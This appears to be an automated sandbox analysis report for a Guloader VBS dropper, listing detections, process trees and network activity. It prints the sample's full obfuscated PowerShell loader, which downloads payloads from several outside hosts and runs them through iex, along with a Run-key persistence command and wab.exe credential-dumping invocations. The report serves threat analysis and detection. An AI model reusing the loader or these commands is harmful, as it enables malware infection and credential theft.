Analysis Overview
SHA256
b13adc656bdc9a6425b6075e7f016debcea9cca87ccdc9faca337a03f31b4c79
Threat Level: Known bad
The file b13adc656bdc9a6425b6075e7f016debcea9cca87ccdc9faca337a03f31b4c79.vbs was found to be: Known bad.
Malicious Activity Summary
Guloader,Cloudeye
Blocklisted process makes network request
Checks computer location settings
Adds Run key to start application
Suspicious use of NtCreateThreadExHideFromDebugger
Suspicious use of SetThreadContext
Suspicious use of NtSetInformationThreadHideFromDebugger
Enumerates physical storage devices
Program crash
Modifies registry key
Suspicious use of UnmapMainImage
Suspicious use of WriteProcessMemory
Suspicious behavior: MapViewOfSection
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-07-09 18:54
Signatures
Analysis: behavioral2
Detonation Overview
Submitted
2024-07-09 18:54
Reported
2024-07-09 18:56
Platform
win10v2004-20240709-en
Max time kernel
150s
Max time network
151s
Command Line
Signatures
Guloader,Cloudeye
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key value queried | \REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Algoritmiskes = "%Paginerende% -w 1 $elektronspillets=(Get-ItemProperty -Path 'HKCU:\\Coindication\\').Fyrsvamp;%Paginerende% ($elektronspillets)" | C:\Windows\SysWOW64\reg.exe | N/A |
Suspicious use of NtCreateThreadExHideFromDebugger
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of SetThreadContext
Enumerates physical storage devices
Program crash
Modifies registry key
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: MapViewOfSection
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of UnmapMainImage
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\b13adc656bdc9a6425b6075e7f016debcea9cca87ccdc9faca337a03f31b4c79.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Dissatisfying Kvatorialguineaneren Unhermitically Otariine Stormhat Revelationer Trykpladers68 Nederdrgtigeres Hmostaseomraadet kontorpersonalernes Turistbussernes Taktnxr Kommaregel Asylsager208 Torchlike Korrektiv Dubbo Dagfinn Tudekopper Tabooing nonmarriageable lokaliseringsprincippernes Micromhos Ledelsessystems Dissatisfying Kvatorialguineaneren Unhermitically Otariine Stormhat Revelationer Trykpladers68 Nederdrgtigeres Hmostaseomraadet kontorpersonalernes Turistbussernes Taktnxr Kommaregel Asylsager208 Torchlike Korrektiv Dubbo Dagfinn Tudekopper Tabooing nonmarriageable lokaliseringsprincippernes Micromhos Ledelsessystems';If (${host}.CurrentCulture) {$Dominator++;}Function Swatheable($Ethography){$Etagevaskens=$Ethography.Length-$Dominator;$Aseismic='SUBsTR';$Aseismic+='ing';For( $Sluicing=1;$Sluicing -lt $Etagevaskens;$Sluicing+=2){$Dissatisfying+=$Ethography.$Aseismic.Invoke( $Sluicing, $Dominator);}$Dissatisfying;}function Overdaadiges($Writeup227){ . ($Eftersynkroniser) ($Writeup227);}$Riffelgangen=Swatheable 'BMAoUz.i,l l a,/E5 . 0K ( W iMn d.o,wRs N Tg p1.0 . 0 ;. WFi nB6 4S;, x 6A4B;, sr,v : 1.2.1 . 0g) BGLe c.ksoA/f2 0 1m0M0 1O0,1, FSiDrFeRf o x /K1 2U1T. 0R ';$Spaltedefinition=Swatheable 'PU s eOrS- ADg.eSn t. ';$Stormhat=Swatheable 'Ph t t p sN:T/s/Bm,o.v.i e s.mDaRc kBtAa.l kE. c oKm /RKSoOl oTnAiGaTl vSa,r e nA. eBm,zI>IhNtKt pns.: /,/FmKiElRaLnsa,cDeJs,.OcSo m,/CKDo lTo n,i a lVv aLr e,n .UeOm z > hUtPt p :A/./C1 0R3 .R1F9,5.. 2.3Y7,.C4 3H/ K o l o nBi.a,lSvFa rAeUnF.Se,mAz.> h tht.p s :./ /DfCi,rSsUt 4.lNoPc.k s mGiMtBh sA.Bc oI. u k,/HK.oMleo.nLiFa l vIa.rPefnM. eKm.z ';$Barskt=Swatheable '.>S ';$Eftersynkroniser=Swatheable ' iSeOx. 
';$Hyperpolysyllabically='Nederdrgtigeres';$Direktrstols = Swatheable 'Be,c h,o %DaJpvp dOaHtPaP%.\,CSo q u,e l.uVc,h e 1,4S.Mm,y xL V&S& Re.c hDo FtE ';Overdaadiges (Swatheable 'H$ g lHoNbtavl,:KDLozgVw o o d =H(,c m d, /.cH $ DEiKrPe.kItDr.s,t oTl s )A ');Overdaadiges (Swatheable ' $ g.l o bSa.lP: O,t.aUrRiIi.n eM= $DS tLoUr mHh a.tM.Js p lBiHt (S$ B a r sSk t )L ');Overdaadiges (Swatheable 'P[ NBe t . S.e rSv.iUc e PIo iBn.tFM aDn.a g eRr ]P: :BS,eEcNu r iItmyFP rUoWtBo cPoUl .=S [SN,eIt .HS eAcPuUriiAtAyFPKr oHthoPcSoDl T.y p eM]k: :,TSlGsA1,2a ');$Stormhat=$Otariine[0];$Maintainable= (Swatheable 'l$sgOl.oFbaaKlL:.G e nfn.eUmMsAn iEt.sPtSa lPsB=RNAe,wP-,ORbIj,eSc t NS y s,t.eHm . N eHt . W,eSb.C,l iSe n t');$Maintainable+=$Dogwood[1];Overdaadiges ($Maintainable);Overdaadiges (Swatheable 'B$ G eAn nAe m.s n i tVsSt acl.s..,HDeMa d,e,rms [ $ S p.a.lSt.e d e fCiCn i t,i,o n ].=,$SR,iMf.fDe l g.aSn gJeOnB ');$Uddunstningen=Swatheable 'A$.G e n,n e mBsTnci tBsGt,aLl s..MD,oAw nMl,oGa d FDihlFe ( $ SHtBo r m hVaAtK, $ l,o kBaTlOi sDe rPi nMgPsUpar,iMn c i pSpHe,r.nEe sD) ';$lokaliseringsprincippernes=$Dogwood[0];Overdaadiges (Swatheable ' $Cg l oSb.aIl.:URAeInMgBuOeSrMa = (ST e s tF- PSaAt hW U$BlRoSkNa.l.iDsAeMr i,n g.s p.rNi n cSirpbpAeBr.nAe s )C ');while (!$Renguera) {Overdaadiges (Swatheable '.$ gIl o bAaFlS:ML.uKf.t e nEs,=O$ t rOu.e, ') ;Overdaadiges $Uddunstningen;Overdaadiges (Swatheable ',S,tna.rPtH-US lre eTpC .4. ');Overdaadiges (Swatheable 'R$Wg l.oSb akl :SR eDn.gPu eCr,a = (LT,eUs tD-EP.aStNh B$ l o kSaul,iTs,e r i nPgSsTp r ibn cBi.pPpAe.r nSe,s,)U ') ;Overdaadiges (Swatheable ',$Sgal oObFa.lM:FU,nShBeGrUmCistDi cCa.l.lSyP= $,g lVo bRaKl,:,KRv a tDoirAi abl gFuAi nfeUaBn e,rKe n + +P%N$OO t.aTrMi i n,eD. c oSuPnLtV ') ;$Stormhat=$Otariine[$Unhermitically];}$Agnellis=370878;$Underprikket=26015;Overdaadiges (Swatheable '.$TgEl.oAbEa l :AHSmUo,sStHa sAepoTmMr a a dPe.tA F=. 
AG eIt.-.CFo n tFe n,tB R$Sl o,kAaIl,iTs e rKiSnAgSs pnr,iWn,c.iMp pKeIr nTefsB ');Overdaadiges (Swatheable 'p$KgSl o b,aAl.:IT,eFlTeMsscCoTpUiBn gD H=I ,[,S yDs,t e,m .FC o nTv e.rUt,] :O: F r.o.mTB abs e.6U4 S t,r.i n g (Q$ HDmSoSs tAa.s e.oKmUr.aTaKd e.tS), ');Overdaadiges (Swatheable '.$.gbl o b.aBlU: TLa k tVn x rN =, ,[dS,y,sDtVetm.. TSeBx tS.IE nAcUo dCi nLg ] :D:LA.SrC.I,IM.NG eLt SKtIrCiRn g (K$CTAe l e s.c,oPpLi,nfg )H ');Overdaadiges (Swatheable 'D$,gClSo bAaMlO: S.tAuTb s = $,T,a,kUt.n,xTr . sDumb sUt,r.i.n.g,(P$DAAgTnIe lAlNi.s ,f$TUFnld e rBpFr iAk kSeYtS)S ');Overdaadiges $Stubs;"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Coqueluche14.myx && echo t"
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Dissatisfying Kvatorialguineaneren Unhermitically Otariine Stormhat Revelationer Trykpladers68 Nederdrgtigeres Hmostaseomraadet kontorpersonalernes Turistbussernes Taktnxr Kommaregel Asylsager208 Torchlike Korrektiv Dubbo Dagfinn Tudekopper Tabooing nonmarriageable lokaliseringsprincippernes Micromhos Ledelsessystems Dissatisfying Kvatorialguineaneren Unhermitically Otariine Stormhat Revelationer Trykpladers68 Nederdrgtigeres Hmostaseomraadet kontorpersonalernes Turistbussernes Taktnxr Kommaregel Asylsager208 Torchlike Korrektiv Dubbo Dagfinn Tudekopper Tabooing nonmarriageable lokaliseringsprincippernes Micromhos Ledelsessystems';If (${host}.CurrentCulture) {$Dominator++;}Function Swatheable($Ethography){$Etagevaskens=$Ethography.Length-$Dominator;$Aseismic='SUBsTR';$Aseismic+='ing';For( $Sluicing=1;$Sluicing -lt $Etagevaskens;$Sluicing+=2){$Dissatisfying+=$Ethography.$Aseismic.Invoke( $Sluicing, $Dominator);}$Dissatisfying;}function Overdaadiges($Writeup227){ . ($Eftersynkroniser) ($Writeup227);}$Riffelgangen=Swatheable 'BMAoUz.i,l l a,/E5 . 0K ( W iMn d.o,wRs N Tg p1.0 . 0 ;. WFi nB6 4S;, x 6A4B;, sr,v : 1.2.1 . 0g) BGLe c.ksoA/f2 0 1m0M0 1O0,1, FSiDrFeRf o x /K1 2U1T. 0R ';$Spaltedefinition=Swatheable 'PU s eOrS- ADg.eSn t. ';$Stormhat=Swatheable 'Ph t t p sN:T/s/Bm,o.v.i e s.mDaRc kBtAa.l kE. c oKm /RKSoOl oTnAiGaTl vSa,r e nA. eBm,zI>IhNtKt pns.: /,/FmKiElRaLnsa,cDeJs,.OcSo m,/CKDo lTo n,i a lVv aLr e,n .UeOm z > hUtPt p :A/./C1 0R3 .R1F9,5.. 2.3Y7,.C4 3H/ K o l o nBi.a,lSvFa rAeUnF.Se,mAz.> h tht.p s :./ /DfCi,rSsUt 4.lNoPc.k s mGiMtBh sA.Bc oI. u k,/HK.oMleo.nLiFa l vIa.rPefnM. eKm.z ';$Barskt=Swatheable '.>S ';$Eftersynkroniser=Swatheable ' iSeOx. 
';$Hyperpolysyllabically='Nederdrgtigeres';$Direktrstols = Swatheable 'Be,c h,o %DaJpvp dOaHtPaP%.\,CSo q u,e l.uVc,h e 1,4S.Mm,y xL V&S& Re.c hDo FtE ';Overdaadiges (Swatheable 'H$ g lHoNbtavl,:KDLozgVw o o d =H(,c m d, /.cH $ DEiKrPe.kItDr.s,t oTl s )A ');Overdaadiges (Swatheable ' $ g.l o bSa.lP: O,t.aUrRiIi.n eM= $DS tLoUr mHh a.tM.Js p lBiHt (S$ B a r sSk t )L ');Overdaadiges (Swatheable 'P[ NBe t . S.e rSv.iUc e PIo iBn.tFM aDn.a g eRr ]P: :BS,eEcNu r iItmyFP rUoWtBo cPoUl .=S [SN,eIt .HS eAcPuUriiAtAyFPKr oHthoPcSoDl T.y p eM]k: :,TSlGsA1,2a ');$Stormhat=$Otariine[0];$Maintainable= (Swatheable 'l$sgOl.oFbaaKlL:.G e nfn.eUmMsAn iEt.sPtSa lPsB=RNAe,wP-,ORbIj,eSc t NS y s,t.eHm . N eHt . W,eSb.C,l iSe n t');$Maintainable+=$Dogwood[1];Overdaadiges ($Maintainable);Overdaadiges (Swatheable 'B$ G eAn nAe m.s n i tVsSt acl.s..,HDeMa d,e,rms [ $ S p.a.lSt.e d e fCiCn i t,i,o n ].=,$SR,iMf.fDe l g.aSn gJeOnB ');$Uddunstningen=Swatheable 'A$.G e n,n e mBsTnci tBsGt,aLl s..MD,oAw nMl,oGa d FDihlFe ( $ SHtBo r m hVaAtK, $ l,o kBaTlOi sDe rPi nMgPsUpar,iMn c i pSpHe,r.nEe sD) ';$lokaliseringsprincippernes=$Dogwood[0];Overdaadiges (Swatheable ' $Cg l oSb.aIl.:URAeInMgBuOeSrMa = (ST e s tF- PSaAt hW U$BlRoSkNa.l.iDsAeMr i,n g.s p.rNi n cSirpbpAeBr.nAe s )C ');while (!$Renguera) {Overdaadiges (Swatheable '.$ gIl o bAaFlS:ML.uKf.t e nEs,=O$ t rOu.e, ') ;Overdaadiges $Uddunstningen;Overdaadiges (Swatheable ',S,tna.rPtH-US lre eTpC .4. ');Overdaadiges (Swatheable 'R$Wg l.oSb akl :SR eDn.gPu eCr,a = (LT,eUs tD-EP.aStNh B$ l o kSaul,iTs,e r i nPgSsTp r ibn cBi.pPpAe.r nSe,s,)U ') ;Overdaadiges (Swatheable ',$Sgal oObFa.lM:FU,nShBeGrUmCistDi cCa.l.lSyP= $,g lVo bRaKl,:,KRv a tDoirAi abl gFuAi nfeUaBn e,rKe n + +P%N$OO t.aTrMi i n,eD. c oSuPnLtV ') ;$Stormhat=$Otariine[$Unhermitically];}$Agnellis=370878;$Underprikket=26015;Overdaadiges (Swatheable '.$TgEl.oAbEa l :AHSmUo,sStHa sAepoTmMr a a dPe.tA F=. 
AG eIt.-.CFo n tFe n,tB R$Sl o,kAaIl,iTs e rKiSnAgSs pnr,iWn,c.iMp pKeIr nTefsB ');Overdaadiges (Swatheable 'p$KgSl o b,aAl.:IT,eFlTeMsscCoTpUiBn gD H=I ,[,S yDs,t e,m .FC o nTv e.rUt,] :O: F r.o.mTB abs e.6U4 S t,r.i n g (Q$ HDmSoSs tAa.s e.oKmUr.aTaKd e.tS), ');Overdaadiges (Swatheable '.$.gbl o b.aBlU: TLa k tVn x rN =, ,[dS,y,sDtVetm.. TSeBx tS.IE nAcUo dCi nLg ] :D:LA.SrC.I,IM.NG eLt SKtIrCiRn g (K$CTAe l e s.c,oPpLi,nfg )H ');Overdaadiges (Swatheable 'D$,gClSo bAaMlO: S.tAuTb s = $,T,a,kUt.n,xTr . sDumb sUt,r.i.n.g,(P$DAAgTnIe lAlNi.s ,f$TUFnld e rBpFr iAk kSeYtS)S ');Overdaadiges $Stubs;"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Coqueluche14.myx && echo t"
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Algoritmiskes" /t REG_EXPAND_SZ /d "%Paginerende% -w 1 $elektronspillets=(Get-ItemProperty -Path 'HKCU:\Coindication\').Fyrsvamp;%Paginerende% ($elektronspillets)"
C:\Windows\SysWOW64\reg.exe
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Algoritmiskes" /t REG_EXPAND_SZ /d "%Paginerende% -w 1 $elektronspillets=(Get-ItemProperty -Path 'HKCU:\Coindication\').Fyrsvamp;%Paginerende% ($elektronspillets)"
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\rzbivks"
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\ctganddgxs"
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\mvltovwilahgiw"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 3272 -ip 3272
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 2904 -ip 2904
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 204 -p 400 -ip 400
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3272 -s 12
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2904 -s 12
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 400 -s 12
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\rendl"
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\uyanmfeoj"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 4264 -ip 4264
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\eafgnxoixvow"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 5116 -ip 5116
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 1352 -ip 1352
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4264 -s 12
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5116 -s 12
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1352 -s 12
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\yityrwjukssqvydvandjmigzvicenqsn"
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\jkgq"
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\lembkhe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 2844 -ip 2844
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 3348 -ip 3348
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 4252 -ip 4252
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2844 -s 12
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3348 -s 12
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4252 -s 12
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\gtiapoyaaegbtlsibnyfqbzhygi"
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\qnnligjuwmyfesgmlxlyaguqymzijc"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 2428 -ip 2428
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\apsdiruwkvqkggcyciyalsohhtjrcnjkn"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 2008 -ip 2008
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 4348 -ip 4348
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2428 -s 12
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2008 -s 12
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4348 -s 12
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\veovnxghxrveshhevumtbt"
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\xytnfqrblznicnvimfymegnyb"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 1008 -ip 1008
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\ibzygicczhfvftrmwqtoplhhbrpv"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 4692 -ip 4692
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 4660 -ip 4660
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1008 -s 12
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4660 -s 12
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4692 -s 12
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\nkailzhhjmbtbijwgfui"
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\pefaesrjwutydoyixqhcsma"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 4648 -ip 4648
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\zgttfkcdkcllovumhatdvqvyewm"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 1228 -ip 1228
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 1088 -ip 1088
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4648 -s 12
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1228 -s 12
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1088 -s 12
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\ungkjjxoyzpfawy"
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\epmvcbhqmhhjckmwrxu"
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\hkzodusjapaomqiaiihrhr"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 4556 -ip 4556
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 2804 -ip 2804
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 2104 -ip 2104
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2804 -s 12
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2104 -s 12
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4556 -s 12
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\bznfhsmvvl"
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\ltayalxwjuwuax"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 392 -p 1700 -ip 1700
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\wvgqadiqxcozldpwc"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 1556 -ip 1556
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 1680 -ip 1680
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1700 -s 12
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1556 -s 12
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1680 -s 12
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\qktifk"
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\tehsfdfdz"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 3292 -ip 3292
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\dgmlyvqxnock"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 2260 -ip 2260
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 3340 -ip 3340
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3292 -s 12
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3340 -s 12
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2260 -s 12
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\ipnv"
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\sktnwff"
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\vmyyxxqfyj"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 2436 -ip 2436
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 2696 -ip 2696
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 3932 -ip 3932
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3932 -s 12
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2436 -s 12
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2696 -s 12
Network
| Country | Destination | Domain | Proto |
| --- | --- | --- | --- |
| US | 8.8.8.8:53 | 133.32.126.40.in-addr.arpa | udp |
